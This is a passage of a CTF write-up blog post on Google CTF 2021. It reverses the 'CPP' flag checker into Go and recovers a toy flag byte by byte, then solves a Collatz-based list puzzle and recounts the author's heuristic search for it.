  <span class="n">Y</span> <span class="o">=</span> <span class="mi">0</span>                 <span class="c1">// 13</span>
  <span class="k">for</span> <span class="n">X</span> <span class="o">!=</span> <span class="mi">0</span> <span class="p">{</span>          <span class="c1">// 14</span>
    <span class="n">Z</span> <span class="o">=</span> <span class="n">X</span>               <span class="c1">// 15</span>
    <span class="n">Z</span> <span class="o">=</span> <span class="n">Z</span> <span class="o">&amp;</span> <span class="n">B</span>           <span class="c1">// 16</span>
    <span class="k">if</span> <span class="p">(</span><span class="n">Z</span> <span class="o">!=</span> <span class="mi">0</span><span class="p">)</span> <span class="p">{</span>       <span class="c1">// 17</span>
      <span class="n">Y</span> <span class="o">+=</span> <span class="n">A</span>            <span class="c1">// 18</span>
    <span class="p">}</span>
    <span class="n">X</span> <span class="o">+=</span> <span class="n">X</span>              <span class="c1">// 19</span>
    <span class="n">A</span> <span class="o">+=</span> <span class="n">A</span>              <span class="c1">// 20</span>
  <span class="p">}</span>                     <span class="c1">// 21</span>
  <span class="n">A</span> <span class="o">=</span> <span class="n">Y</span>                 <span class="c1">// 22</span>
  
  <span class="n">R</span> <span class="o">=</span> <span class="o">~</span><span class="n">R</span>                <span class="c1">// 1</span>
  <span class="n">Z</span> <span class="o">=</span> <span class="mi">1</span>                 <span class="c1">// 2</span>
  <span class="n">R</span> <span class="o">+=</span> <span class="n">Z</span>                <span class="c1">// 3</span>
  <span class="n">R</span> <span class="o">+=</span> <span class="n">Z</span>                <span class="c1">// 4</span>
  <span class="k">if</span> <span class="p">(</span><span class="n">R</span> <span class="o">!=</span> <span class="mi">0</span><span class="p">)</span> <span class="n">abort</span><span class="p">()</span>   <span class="c1">// 5 - 11 (won't reach here)</span>
  
  <span class="n">O</span> <span class="o">=</span> <span class="n">M</span>                 <span class="c1">// 38</span>
  <span class="n">O</span> <span class="o">+=</span> <span class="n">N</span>                <span class="c1">// 39</span>
  <span class="n">M</span> <span class="o">=</span> <span class="n">N</span>                 <span class="c1">// 40</span>
  <span class="n">N</span> <span class="o">=</span> <span class="n">O</span>                 <span class="c1">// 41</span>
  <span class="n">A</span> <span class="o">+=</span> <span class="n">M</span>                <span class="c1">// 42</span>
  <span class="n">B</span> <span class="o">=</span> <span class="mh">0x20</span>              <span class="c1">// 43</span>
  <span class="n">B</span> <span class="o">+=</span> <span class="n">I</span>                <span class="c1">// 44</span>
  <span class="n">C</span> <span class="o">=</span> <span class="n">LOAD</span><span class="p">(</span><span class="n">B</span><span class="p">)</span>           <span class="c1">// 45</span>
  <span class="n">A</span> <span class="o">^=</span> <span class="n">C</span>                <span class="c1">// 46</span>
  <span class="n">P</span> <span class="o">+=</span> <span class="n">A</span>                <span class="c1">// 47</span>

  <span class="n">B</span> <span class="o">=</span> <span class="mh">0x40</span>              <span class="c1">// 48</span>
  <span class="n">B</span> <span class="o">+=</span> <span class="n">I</span>                <span class="c1">// 49</span>
  <span class="n">A</span> <span class="o">=</span> <span class="n">LOAD</span><span class="p">(</span><span class="n">B</span><span class="p">)</span>           <span class="c1">// 50</span>
  <span class="n">A</span> <span class="o">^=</span> <span class="n">P</span>                <span class="c1">// 51</span>
  <span class="n">Q</span> <span class="o">|=</span> <span class="n">A</span>                <span class="c1">// 52</span>
  <span class="n">A</span> <span class="o">=</span> <span class="mi">1</span>                 <span class="c1">// 53</span>
  <span class="n">I</span> <span class="o">+=</span> <span class="n">A</span>                <span class="c1">// 54</span>
<span class="p">}</span>

<span class="k">if</span> <span class="p">(</span><span class="n">Q</span> <span class="o">!=</span> <span class="mi">0</span><span class="p">)</span> <span class="p">{</span>           <span class="c1">// 56</span>
    <span class="s">"INVALID FLAG"</span>      <span class="c1">// 57</span>
<span class="p">}</span>

<span class="n">EXIT</span>                    <span class="c1">// 58</span>
</code></pre></div></div>

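<p>After some tidying up and rewriting it in Go, we get the following, where <code class="language-plaintext highlighter-rouge">MEMORY(addr)</code> stands for the byte stored at address <code class="language-plaintext highlighter-rouge">addr</code>:</p>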

<div class="language-go highlighter-rouge"><div class="highlight"><pre class="highlight"><code><span class="k">var</span> <span class="n">M</span> <span class="kt">uint8</span> <span class="o">=</span> <span class="m">0</span>
<span class="k">var</span> <span class="n">N</span> <span class="kt">uint8</span> <span class="o">=</span> <span class="m">1</span>
<span class="k">var</span> <span class="n">P</span> <span class="kt">uint8</span> <span class="o">=</span> <span class="m">0</span>
<span class="k">var</span> <span class="n">Q</span> <span class="kt">uint8</span> <span class="o">=</span> <span class="m">0</span>

<span class="k">for</span> <span class="n">I</span> <span class="o">:=</span> <span class="kt">uint8</span><span class="p">(</span><span class="m">0</span><span class="p">);</span> <span class="n">I</span> <span class="o">&lt;</span> <span class="m">27</span><span class="p">;</span> <span class="n">I</span><span class="o">++</span> <span class="p">{</span>
    <span class="n">A</span> <span class="o">:=</span> <span class="n">MEMORY</span><span class="p">(</span><span class="m">0x80</span> <span class="o">+</span> <span class="n">I</span><span class="p">)</span>
    <span class="n">B</span> <span class="o">:=</span> <span class="n">MEMORY</span><span class="p">(</span><span class="n">I</span><span class="p">)</span>

    <span class="k">var</span> <span class="n">X</span> <span class="kt">uint8</span> <span class="o">=</span> <span class="m">1</span>
    <span class="k">var</span> <span class="n">Y</span> <span class="kt">uint8</span> <span class="o">=</span> <span class="m">0</span>
    <span class="k">for</span> <span class="n">X</span> <span class="o">!=</span> <span class="m">0</span> <span class="p">{</span>
        <span class="k">if</span> <span class="n">X</span><span class="o">&amp;</span><span class="n">B</span> <span class="o">!=</span> <span class="m">0</span> <span class="p">{</span>
            <span class="n">Y</span> <span class="o">+=</span> <span class="n">A</span>
        <span class="p">}</span>
        <span class="n">X</span> <span class="o">+=</span> <span class="n">X</span>
        <span class="n">A</span> <span class="o">+=</span> <span class="n">A</span>
    <span class="p">}</span>
    <span class="n">A</span> <span class="o">=</span> <span class="n">Y</span>

    <span class="n">O</span> <span class="o">:=</span> <span class="n">M</span> <span class="o">+</span> <span class="n">N</span>
    <span class="n">M</span> <span class="o">=</span> <span class="n">N</span>
    <span class="n">N</span> <span class="o">=</span> <span class="n">O</span>

    <span class="n">A</span> <span class="o">+=</span> <span class="n">M</span>
    <span class="n">A</span> <span class="o">^=</span> <span class="n">MEMORY</span><span class="p">(</span><span class="m">0x20</span> <span class="o">+</span> <span class="n">I</span><span class="p">)</span>
    <span class="n">P</span> <span class="o">+=</span> <span class="n">A</span>

    <span class="n">Q</span> <span class="o">|=</span> <span class="n">MEMORY</span><span class="p">(</span><span class="m">0x40</span><span class="o">+</span><span class="n">I</span><span class="p">)</span> <span class="o">^</span> <span class="n">P</span>
<span class="p">}</span>

<span class="k">if</span> <span class="n">Q</span> <span class="o">!=</span> <span class="m">0</span> <span class="p">{</span>
    <span class="n">fmt</span><span class="o">.</span><span class="n">Println</span><span class="p">(</span><span class="s">"invalid flag"</span><span class="p">)</span>
<span class="p">}</span>
</code></pre></div></div>

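<p>Notice that <code class="language-plaintext highlighter-rouge">R</code> is gone. <code class="language-plaintext highlighter-rouge">R</code> is always 1 when instruction 1 runs, and <code class="language-plaintext highlighter-rouge">~1 + 2 == 0</code> in 8-bit arithmetic, so the check at instruction 5 always jumps to 38 and we can optimize it out. Some intermediate variables, such as <code class="language-plaintext highlighter-rouge">C</code> and <code class="language-plaintext highlighter-rouge">Z</code>, are optimized out as well.</p>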

<h2 id="get-the-flag">Get the Flag</h2>

<p>It is possible to figure out the logic behind the memory operations and extract the flag by reversing the process. However, a simpler observation suffices: the flag is rejected if <code class="language-plaintext highlighter-rouge">Q != 0</code> when the program ends. In the entire program, <code class="language-plaintext highlighter-rouge">Q</code> is updated in only one place, <code class="language-plaintext highlighter-rouge">Q |= [some value]</code>, and a bitwise-or never clears a bit that is already set. Therefore, for <code class="language-plaintext highlighter-rouge">Q == 0</code> to hold at the end, <code class="language-plaintext highlighter-rouge">Q</code> must stay zero through every iteration of the loop.</p>

<p>Also, the program processes the flag one byte at a time. Assuming all earlier bytes are correct, if <code class="language-plaintext highlighter-rouge">Q</code> becomes nonzero during some iteration of the loop, then the byte processed in that iteration must be wrong.</p>

<p>Using this knowledge, we can reduce the search space from \(65^{27}\) to \(65 \times 27\). The exploit then tests the flag one character at a time, keeping a character only if <code class="language-plaintext highlighter-rouge">Q</code> stays 0 through its iteration of the loop.</p>
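<p>The idea can be demonstrated end to end with a toy version of the checker. The real memory image is not reproduced in this post, so <code class="language-plaintext highlighter-rouge">buildToyMemory</code> fabricates one from a made-up secret, using arbitrary multipliers and XOR keys. <code class="language-plaintext highlighter-rouge">prefixOK</code> runs the Go rewrite above on a prefix and stops as soon as <code class="language-plaintext highlighter-rouge">Q</code> would become nonzero. <code class="language-plaintext highlighter-rouge">recoverFlag</code> extends the prefix one character at a time from a 65-character alphabet. All three names are hypothetical, and this is a sketch of the approach, not the exploit linked below.</p>

```go
package main

import "fmt"

// prefixOK runs the reversed check loop over flag (a prefix of the full
// flag) against a memory image and reports whether Q stayed zero.
func prefixOK(mem *[256]uint8, flag []byte) bool {
	var m, n, p uint8 = 0, 1, 0
	for i, f := range flag {
		a := f * mem[i]  // 12-22: A * B (mod 256)
		m, n = n, m+n    // 38-41: Fibonacci step
		a += m           // 42
		a ^= mem[0x20+i] // 43-46
		p += a           // 47
		if mem[0x40+i]^p != 0 { // 48-52: this byte would make Q nonzero
			return false
		}
	}
	return true
}

// buildToyMemory fabricates a memory image (secret must be at most 32
// bytes) that accepts secret. Multipliers and XOR keys are arbitrary.
func buildToyMemory(secret []byte) *[256]uint8 {
	var mem [256]uint8
	var m, n, p uint8 = 0, 1, 0
	for i, f := range secret {
		mem[i] = uint8(3 + 2*i)         // odd multiplier
		mem[0x20+i] = uint8(0x5a + 7*i) // XOR key
		a := f * mem[i]
		m, n = n, m+n
		a += m
		a ^= mem[0x20+i]
		p += a
		mem[0x40+i] = p // expected running sum
	}
	return &mem
}

// recoverFlag extends the prefix one character at a time, keeping the
// first candidate for which prefixOK still holds.
func recoverFlag(mem *[256]uint8, length int, alphabet string) ([]byte, bool) {
	flag := make([]byte, 0, length)
	for len(flag) < length {
		found := false
		for i := 0; i < len(alphabet); i++ {
			if prefixOK(mem, append(flag, alphabet[i])) {
				flag = append(flag, alphabet[i])
				found = true
				break
			}
		}
		if !found {
			return flag, false
		}
	}
	return flag, true
}

func main() {
	const alphabet = "abcdefghijklmnopqrstuvwxyzABCDEFGHIJKLMNOPQRSTUVWXYZ0123456789_{}"
	secret := []byte("CTF{toy_flag_not_the_real}")
	mem := buildToyMemory(secret)
	flag, ok := recoverFlag(mem, len(secret), alphabet)
	fmt.Println(string(flag), ok, len(alphabet)) // CTF{toy_flag_not_the_real} true 65
}
```

<p>Because the toy multipliers are odd, multiplying by them is a bijection modulo 256, so exactly one character passes each check. If a multiplier in a real memory image were even, a byte could admit several candidates or none, and the search would need to backtrack.</p>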

<p><img src="/assets/images/google-ctf-2021/cpp2.png" alt="cpp.go" /></p>

<p>The exploit can be found here: <a href="https://gist.github.com/superfashi/f264b9c9f19b8b25065afd9f66bf7ffd" target="_blank">CPP, Google CTF 2021</a>.</p>

<hr />

<h1 id="icantbelieveitsnotcrypto">ICAN’TBELIEVEIT’SNOTCRYPTO</h1>

<p>This is a pretty simple challenge, once you know what is going on.</p>

<p>The challenge asks for two lists <code class="language-plaintext highlighter-rouge">l1</code> and <code class="language-plaintext highlighter-rouge">l2</code>, where <code class="language-plaintext highlighter-rouge">l1</code> contains only 0s and 1s, and <code class="language-plaintext highlighter-rouge">l2</code> contains only 0s, 1s, and 2s. The function <code class="language-plaintext highlighter-rouge">step()</code> is applied to the lists repeatedly, and <code class="language-plaintext highlighter-rouge">count()</code> counts how many steps it takes for them to reach the state <code class="language-plaintext highlighter-rouge">l1 = [1]</code> and <code class="language-plaintext highlighter-rouge">l2 = [0]</code>. The flag is printed if it takes more than 2000 steps.</p>

<p>There are two constraints, namely <code class="language-plaintext highlighter-rouge">len(l1) == len(l2)</code> and <code class="language-plaintext highlighter-rouge">len(l1) &lt; 24</code>, so we can’t simply submit an arbitrarily long list to pass the test.</p>

<p>I spent a <em>LOT</em> of time on this without finding the solution, only to find out afterwards that it is a well-known, well-studied problem in disguise: the process described in the <a href="https://en.wikipedia.org/wiki/Collatz_conjecture">Collatz conjecture</a>. <code class="language-plaintext highlighter-rouge">l1</code> and <code class="language-plaintext highlighter-rouge">l2</code> are just the base-6 digits of a number, least significant digit first, with each digit split across the two lists (its lowest bit goes to <code class="language-plaintext highlighter-rouge">l1</code>, the rest to <code class="language-plaintext highlighter-rouge">l2</code>). A simple conversion script looks like this:</p>

<div class="language-python highlighter-rouge"><div class="highlight"><pre class="highlight"><code><span class="k">def</span> <span class="nf">to_lists</span><span class="p">(</span><span class="n">num</span><span class="p">):</span>
    <span class="n">l1</span> <span class="o">=</span> <span class="p">[]</span>
    <span class="n">l2</span> <span class="o">=</span> <span class="p">[]</span>
    <span class="k">while</span> <span class="n">num</span><span class="p">:</span>
        <span class="n">digit</span> <span class="o">=</span> <span class="n">num</span> <span class="o">%</span> <span class="mi">6</span>
        <span class="n">l1</span><span class="p">.</span><span class="nf">append</span><span class="p">(</span><span class="n">digit</span> <span class="o">&amp;</span> <span class="mi">1</span><span class="p">)</span>
        <span class="n">l2</span><span class="p">.</span><span class="nf">append</span><span class="p">(</span><span class="n">digit</span> <span class="o">&gt;&gt;</span> <span class="mi">1</span><span class="p">)</span>
        <span class="n">num</span> <span class="o">//=</span> <span class="mi">6</span>
    <span class="k">return</span> <span class="n">l1</span><span class="p">,</span> <span class="n">l2</span>

<span class="k">def</span> <span class="nf">from_lists</span><span class="p">(</span><span class="n">l1</span><span class="p">,</span> <span class="n">l2</span><span class="p">):</span>
    <span class="n">num</span><span class="p">,</span> <span class="n">mul</span> <span class="o">=</span> <span class="mi">0</span><span class="p">,</span> <span class="mi">1</span>
    <span class="k">for</span> <span class="n">i</span> <span class="ow">in</span> <span class="nf">range</span><span class="p">(</span><span class="nf">len</span><span class="p">(</span><span class="n">l1</span><span class="p">)):</span>
        <span class="n">digit</span> <span class="o">=</span> <span class="n">l1</span><span class="p">[</span><span class="n">i</span><span class="p">]</span> <span class="o">|</span> <span class="p">(</span><span class="n">l2</span><span class="p">[</span><span class="n">i</span><span class="p">]</span> <span class="o">&lt;&lt;</span> <span class="mi">1</span><span class="p">)</span>
        <span class="n">num</span> <span class="o">+=</span> <span class="n">digit</span> <span class="o">*</span> <span class="n">mul</span>
        <span class="n">mul</span> <span class="o">*=</span> <span class="mi">6</span>
    <span class="k">return</span> <span class="n">num</span>
</code></pre></div></div>

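<p>Since the lists can hold at most 23 base-6 digits, the starting value must be below \(6^{23} \approx 7.9 \times 10^{17}\). The Wikipedia page lists the starting values with the largest total stopping time below various bounds, and the one for \(10^{17}\) already fits:</p>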

<blockquote>
  <p>less than 10<sup>17</sup> is <span class="nowrap">93<span style="margin-left:.25em;">571</span><span style="margin-left:.25em;">393</span><span style="margin-left:.25em;">692</span><span style="margin-left:.25em;">802</span><span style="margin-left:.25em;">302</span></span>, which has 2091 steps […]</p>
</blockquote>

<p>which is enough for the required 2000 steps. Therefore the exploit is simply something like this:</p>

<div class="language-python highlighter-rouge"><div class="highlight"><pre class="highlight"><code><span class="n">char</span> <span class="o">=</span> <span class="nf">ord</span><span class="p">(</span><span class="sh">'</span><span class="s">f</span><span class="sh">'</span><span class="p">)</span>
<span class="nf">assert</span><span class="p">(</span><span class="n">char</span> <span class="o">%</span> <span class="mi">6</span> <span class="o">==</span> <span class="mi">0</span><span class="p">)</span>
<span class="n">l1</span><span class="p">,</span> <span class="n">l2</span> <span class="o">=</span> <span class="nf">to_lists</span><span class="p">(</span><span class="mi">93571393692802302</span><span class="p">)</span>
<span class="n">str1</span><span class="p">,</span> <span class="n">str2</span> <span class="o">=</span> <span class="sh">""</span><span class="p">,</span> <span class="sh">""</span>
<span class="k">for</span> <span class="n">i</span> <span class="ow">in</span> <span class="n">l1</span><span class="p">:</span>
    <span class="n">str1</span> <span class="o">+=</span> <span class="nf">chr</span><span class="p">(</span><span class="n">char</span> <span class="o">+</span> <span class="n">i</span><span class="p">)</span>
<span class="k">for</span> <span class="n">i</span> <span class="ow">in</span> <span class="n">l2</span><span class="p">:</span>
    <span class="n">str2</span> <span class="o">+=</span> <span class="nf">chr</span><span class="p">(</span><span class="n">char</span> <span class="o">+</span> <span class="n">i</span><span class="p">)</span>
<span class="nf">print</span><span class="p">(</span><span class="n">str1</span><span class="p">)</span>
<span class="nf">print</span><span class="p">(</span><span class="n">str2</span><span class="p">)</span>
</code></pre></div></div>

<p>This gives us the strings <code class="language-plaintext highlighter-rouge">fggffgfgfggffffgffgggf</code> and <code class="language-plaintext highlighter-rouge">fgghfgghhhhhhghffgggfh</code>. Submit them and we get the flag.</p>
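<p>Before submitting, the number is cheap to sanity-check in plain Python. The sketch below counts Collatz steps the way Wikipedia does (each \(n \to n/2\) or \(n \to 3n+1\) is one step) and counts base-6 digits. It assumes, as the solution above does, that the challenge’s <code class="language-plaintext highlighter-rouge">count()</code> matches this step count; the helper names are hypothetical.</p>

```python
def total_stopping_time(n: int) -> int:
    """Number of Collatz steps needed for n to reach 1."""
    steps = 0
    while n != 1:
        n = n // 2 if n % 2 == 0 else 3 * n + 1
        steps += 1
    return steps


def base6_length(n: int) -> int:
    """Number of base-6 digits, i.e. len(l1) == len(l2) after to_lists(n)."""
    length = 0
    while n:
        n //= 6
        length += 1
    return length


START = 93571393692802302
print(base6_length(START), total_stopping_time(START))
```

<p>The first number should be 22 (within the 23-digit limit, matching the 22-character strings above), and the second should be the step count Wikipedia reports, 2091.</p>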

<hr />

<p>Luckily, my teammates figured this out in the end; I did not. I was on a path of no return: I tried to find the answer by search.</p>

<p>The following is a record of what I did during the CTF. As you will see, I came extremely close to the answer, in both my result and my method.</p>

<h2 id="reversible-function">Reversible Function</h2>

<p>The <code class="language-plaintext highlighter-rouge">step()</code> function may not be one-to-one, but it is definitely reversible: given a state, we can enumerate all of its possible predecessors.</p>

<p>First, we know that both lists have the same length and that they never both end in <code class="language-plaintext highlighter-rouge">0</code>, because such trailing zeros are stripped away. The problem is how many <code class="language-plaintext highlighter-rouge">0</code>s to append back, since any number of them could have been stripped. Don’t worry about that just yet; let’s set it aside and continue the analysis.</p>

<p>The <code class="language-plaintext highlighter-rouge">SBOX</code> is easy to reverse because it is clearly one-to-one, so we can build a reverse mapping to convert the lists back.</p>
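<p>Building the reverse mapping takes one dict comprehension. The sketch below assumes <code class="language-plaintext highlighter-rouge">SBOX</code> is a dict from <code class="language-plaintext highlighter-rouge">(l1[i], l2[i])</code> pairs to pairs, which matches how <code class="language-plaintext highlighter-rouge">RBOX</code> is indexed in <code class="language-plaintext highlighter-rouge">reverse_step</code> further down; <code class="language-plaintext highlighter-rouge">TOY_SBOX</code> is a hypothetical permutation, not the challenge’s table.</p>

```python
def invert_sbox(sbox: dict) -> dict:
    """Build the inverse mapping; fail loudly if SBOX is not one-to-one."""
    rbox = {out: inp for inp, out in sbox.items()}
    if len(rbox) != len(sbox):
        raise ValueError("SBOX is not a bijection, so it cannot be inverted")
    return rbox


# Hypothetical SBOX over (l1 digit, l2 digit) pairs; the real table comes
# from the challenge source and is not reproduced here.
TOY_SBOX = {
    (0, 0): (0, 1), (0, 1): (1, 1), (0, 2): (0, 0),
    (1, 0): (1, 2), (1, 1): (0, 2), (1, 2): (1, 0),
}
RBOX = invert_sbox(TOY_SBOX)

# Round trip: every pair maps back to itself.
assert all(RBOX[TOY_SBOX[pair]] == pair for pair in TOY_SBOX)
```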

<p>Notice the line <code class="language-plaintext highlighter-rouge">l1.append(0)</code>, which means <code class="language-plaintext highlighter-rouge">l1</code> should end with a <code class="language-plaintext highlighter-rouge">0</code>. If <code class="language-plaintext highlighter-rouge">l1</code> does not end with a <code class="language-plaintext highlighter-rouge">0</code>, then that <code class="language-plaintext highlighter-rouge">0</code> must have been stripped together with a trailing <code class="language-plaintext highlighter-rouge">0</code> of <code class="language-plaintext highlighter-rouge">l2</code>. So we have something like this:</p>

<div class="language-python highlighter-rouge"><div class="highlight"><pre class="highlight"><code><span class="k">if</span> <span class="n">l1</span><span class="p">[</span><span class="o">-</span><span class="mi">1</span><span class="p">]</span> <span class="o">!=</span> <span class="mi">0</span><span class="p">:</span>
    <span class="n">l1</span><span class="p">.</span><span class="nf">append</span><span class="p">(</span><span class="mi">0</span><span class="p">)</span>
    <span class="n">l2</span><span class="p">.</span><span class="nf">append</span><span class="p">(</span><span class="mi">0</span><span class="p">)</span>
<span class="n">l1</span><span class="p">.</span><span class="nf">pop</span><span class="p">()</span> <span class="c1"># correspond to l1.append(0)
</span></code></pre></div></div>

<p>Here we append only one <code class="language-plaintext highlighter-rouge">0</code> to the end of each list. Why only one? If we appended more than one, the lists could not be the result of a single <code class="language-plaintext highlighter-rouge">step()</code>, since trailing <code class="language-plaintext highlighter-rouge">0</code>s are trimmed at the end of each <code class="language-plaintext highlighter-rouge">step()</code>.</p>

<p>For the final part, there are two cases: either the original <code class="language-plaintext highlighter-rouge">l1</code> began with a <code class="language-plaintext highlighter-rouge">0</code>, or <code class="language-plaintext highlighter-rouge">l1</code> began with a <code class="language-plaintext highlighter-rouge">1</code> and the resulting <code class="language-plaintext highlighter-rouge">l2</code> begins with a <code class="language-plaintext highlighter-rouge">1</code>. So we have</p>

<div class="language-python highlighter-rouge"><div class="highlight"><pre class="highlight"><code><span class="c1"># possibility 1
</span><span class="n">ori_l1</span><span class="p">,</span> <span class="n">ori_l2</span> <span class="o">=</span> <span class="p">[</span><span class="mi">0</span><span class="p">]</span> <span class="o">+</span> <span class="n">l1</span><span class="p">,</span> <span class="n">l2</span>     <span class="c1"># correspond to l1.pop(0)
</span>
<span class="c1"># possibility 2
</span><span class="k">if</span> <span class="n">l2</span><span class="p">[</span><span class="mi">0</span><span class="p">]</span> <span class="o">==</span> <span class="mi">1</span> <span class="ow">and</span> <span class="n">l1</span><span class="p">[</span><span class="mi">0</span><span class="p">]</span> <span class="o">==</span> <span class="mi">1</span><span class="p">:</span>
    <span class="n">ori_l1</span><span class="p">,</span> <span class="n">ori_l2</span> <span class="o">=</span> <span class="n">l1</span><span class="p">,</span> <span class="n">l2</span><span class="p">[</span><span class="mi">1</span><span class="p">:]</span>    <span class="c1"># correspond to l2.insert(0, 1)
</span></code></pre></div></div>

<p>Taken together, we have the reverse function as:</p>

<div class="language-python highlighter-rouge"><div class="highlight"><pre class="highlight"><code><span class="k">def</span> <span class="nf">reverse_step</span><span class="p">(</span><span class="n">l1</span><span class="p">,</span> <span class="n">l2</span><span class="p">):</span>
    <span class="k">if</span> <span class="ow">not</span> <span class="n">l1</span> <span class="ow">or</span> <span class="ow">not</span> <span class="n">l2</span> <span class="ow">or</span> <span class="n">l1</span><span class="p">[</span><span class="o">-</span><span class="mi">1</span><span class="p">]</span> <span class="o">==</span> <span class="n">l2</span><span class="p">[</span><span class="o">-</span><span class="mi">1</span><span class="p">]</span> <span class="o">==</span> <span class="mi">0</span><span class="p">:</span>
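        <span class="k">return</span> <span class="p">[]</span>  <span class="c1"># invalid state: no predecessors
</span>    <span class="n">l1</span><span class="p">,</span> <span class="n">l2</span> <span class="o">=</span> <span class="nf">list</span><span class="p">(</span><span class="n">l1</span><span class="p">),</span> <span class="nf">list</span><span class="p">(</span><span class="n">l2</span><span class="p">)</span>  <span class="c1"># work on copies, don't mutate the caller's lists
</span>    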
    <span class="k">for</span> <span class="n">i</span> <span class="ow">in</span> <span class="nf">range</span><span class="p">(</span><span class="nf">len</span><span class="p">(</span><span class="n">l1</span><span class="p">)):</span>
        <span class="n">l1</span><span class="p">[</span><span class="n">i</span><span class="p">],</span> <span class="n">l2</span><span class="p">[</span><span class="n">i</span><span class="p">]</span> <span class="o">=</span> <span class="n">RBOX</span><span class="p">[(</span><span class="n">l1</span><span class="p">[</span><span class="n">i</span><span class="p">],</span> <span class="n">l2</span><span class="p">[</span><span class="n">i</span><span class="p">])]</span>
    
    <span class="k">if</span> <span class="n">l1</span><span class="p">[</span><span class="o">-</span><span class="mi">1</span><span class="p">]</span> <span class="o">==</span> <span class="mi">0</span><span class="p">:</span>
        <span class="n">l1</span><span class="p">.</span><span class="nf">pop</span><span class="p">()</span>
    <span class="k">else</span><span class="p">:</span>
        <span class="n">l2</span><span class="p">.</span><span class="nf">append</span><span class="p">(</span><span class="mi">0</span><span class="p">)</span>
    
    <span class="n">ret</span> <span class="o">=</span> <span class="p">[[[</span><span class="mi">0</span><span class="p">]</span> <span class="o">+</span> <span class="n">l1</span><span class="p">,</span> <span class="n">l2</span><span class="p">]]</span>
    <span class="k">if</span> <span class="n">l2</span><span class="p">[</span><span class="mi">0</span><span class="p">]</span> <span class="o">==</span> <span class="mi">1</span> <span class="ow">and</span> <span class="n">l1</span> <span class="ow">and</span> <span class="n">l1</span><span class="p">[</span><span class="mi">0</span><span class="p">]</span> <span class="o">==</span> <span class="mi">1</span><span class="p">:</span>
        <span class="n">ret</span><span class="p">.</span><span class="nf">append</span><span class="p">([</span><span class="n">l1</span><span class="p">,</span> <span class="n">l2</span><span class="p">[</span><span class="mi">1</span><span class="p">:]])</span>
    <span class="k">return</span> <span class="n">ret</span>
</code></pre></div></div>

<p>where <code class="language-plaintext highlighter-rouge">RBOX</code> is the inverse of <code class="language-plaintext highlighter-rouge">SBOX</code>.</p>

<h2 id="search">Search</h2>

<p>So our search space is an incomplete binary tree (which I later found out is called the <em>Collatz graph</em>). However, for a search depth of more than 2000, there could be as many as \(2^{2000}\) states. Even if most branches are single links, the search space is still far too large for simple algorithms like breadth-first search, so that’s a no-go.</p>

<p>Depth-first search seems like a good idea. However, the list length is limited to 23, so our DFS effectively becomes an IDDFS, which performs no better than BFS in this case. So we have to turn to something else. By the way, the longest path problem is NP-hard in general, although I’m not quite sure this really is a longest path problem.</p>

<p>After trying a lot of things, I finally settled on a heuristic, priority-based, parallelized search algorithm with exploration. I know that sounds like a lot, so let me explain.</p>

<h3 id="heuristic">Heuristic</h3>

<p>The simplest option, which I tried first, is to rely solely on the <code class="language-plaintext highlighter-rouge">count</code> (stopping time): whichever node has the largest <code class="language-plaintext highlighter-rouge">count</code> gets searched first. That quickly turned out to be really bad, because the search would get stuck on leaves of branches that have no room to grow further because of the length limit.</p>

<p>Then I tried a lot of different functions based on <code class="language-plaintext highlighter-rouge">count</code> and another parameter, the <code class="language-plaintext highlighter-rouge">length</code> of the list (an upper bound on the number). My intuition was that a node with a sufficiently large <code class="language-plaintext highlighter-rouge">count</code> but a small <code class="language-plaintext highlighter-rouge">length</code> must be better, since it has much more room to spread out before hitting the length limit.</p>

<p>A few things I tried:</p>

<ul>
  <li>
\[\frac{\text{count}^{k_1}}{\text{length}^{k_2}}\]
  </li>
  <li>
\[\max\left(k_1 \frac{\text{count}}{2000}, k_2 \frac{\text{length}}{23}\right)\]
  </li>
  <li>
\[\log\text{count} \cdot \left(1-\frac{\text{length}}{23}\right)\]
  </li>
  <li>
\[k_1 \frac{\text{count}}{2000} - k_2 \frac{\text{length}}{23}\]
  </li>
</ul>

<p>where \(k_1\) and \(k_2\) are weights that I tuned by hand. All of them worked pretty well after manual tuning; however, they all plateaued at around 1300 steps, which is still far from what we need.</p>
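<p>To make the idea concrete, here is a minimal best-first search in Python using the scores above. It is a sketch under assumptions: instead of the list-based <code class="language-plaintext highlighter-rouge">reverse_step</code>, it walks the Collatz graph backwards on plain integers (the predecessors of \(n\) are \(2n\) and, when \(n \equiv 4 \pmod 6\) and \(n &gt; 4\), \((n-1)/3\)), uses the number of base-6 digits as <code class="language-plaintext highlighter-rouge">length</code>, and prunes states longer than the limit. The helper names and the <code class="language-plaintext highlighter-rouge">budget</code> parameter are hypothetical.</p>

```python
import heapq
import math

MAX_LEN = 23   # list length limit from the challenge
TARGET = 2000  # number of steps we need


# The four hand-tuned scores from the list above (k1, k2 are weights).
def h_ratio(count, length, k1=1.0, k2=1.0):
    return count ** k1 / length ** k2

def h_max(count, length, k1=1.0, k2=1.0):
    return max(k1 * count / TARGET, k2 * length / MAX_LEN)

def h_log(count, length):
    # log(count) is undefined at count == 0, so clamp it for the start state
    return math.log(max(count, 1)) * (1 - length / MAX_LEN)

def h_diff(count, length, k1=1.0, k2=1.0):
    return k1 * count / TARGET - k2 * length / MAX_LEN


def predecessors(n):
    """Toy stand-in for reverse_step(): Collatz predecessors of integer n."""
    preds = [2 * n]
    if n % 6 == 4 and n > 4:  # then (n - 1) / 3 is an odd integer > 1
        preds.append((n - 1) // 3)
    return preds

def base6_length(n):
    length = 0
    while n:
        n //= 6
        length += 1
    return length


def best_first(score, max_len, budget=10_000):
    """Pop the highest-scoring state, push its predecessors; return the
    (count, number) pair with the largest count seen within the budget."""
    tie = 0  # tie-breaker so heapq never has to compare the states themselves
    heap = [(-score(0, 1), tie, 0, 1)]  # start from the final state n = 1
    best = (0, 1)
    while heap and budget > 0:
        budget -= 1
        _, _, count, n = heapq.heappop(heap)
        best = max(best, (count, n))
        for p in predecessors(n):
            length = base6_length(p)
            if length <= max_len:  # prune states longer than the limit
                tie += 1
                heapq.heappush(heap, (-score(count + 1, length), tie, count + 1, p))
    return best


print(best_first(h_diff, max_len=4, budget=5000))
```

<p>Swapping <code class="language-plaintext highlighter-rouge">h_diff</code> for another score only changes the order in which nodes are expanded; the <code class="language-plaintext highlighter-rouge">count</code> stored with each node is always its exact number of steps to 1.</p>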

<h3 id="exploration">Exploration</h3>

<p>Suspecting that the heuristic was not good enough, I also added an exploration factor \(1 &gt; p \gg 0\) into the mix. Every time a node is selected, the program picks the top of the priority queue (i.e. the node with the largest heuristic) with probability \(p\), and with the small remaining probability \(1-p\) picks something from the middle of the queue instead.</p>

